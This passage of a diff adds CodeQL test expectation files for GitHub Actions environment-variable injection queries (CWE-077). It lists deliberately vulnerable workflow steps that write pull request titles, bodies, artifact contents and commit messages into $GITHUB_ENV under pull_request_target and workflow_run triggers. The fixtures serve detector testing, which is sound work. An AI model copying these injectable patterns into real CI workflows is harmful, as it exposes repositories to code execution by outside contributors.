}}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref new file mode 100644 index 000000000000..b3f6c4bf7822 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected new file mode 100644 index 000000000000..94e2af8ecaa7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -0,0 +1,95 @@ +edges +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | +nodes +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq 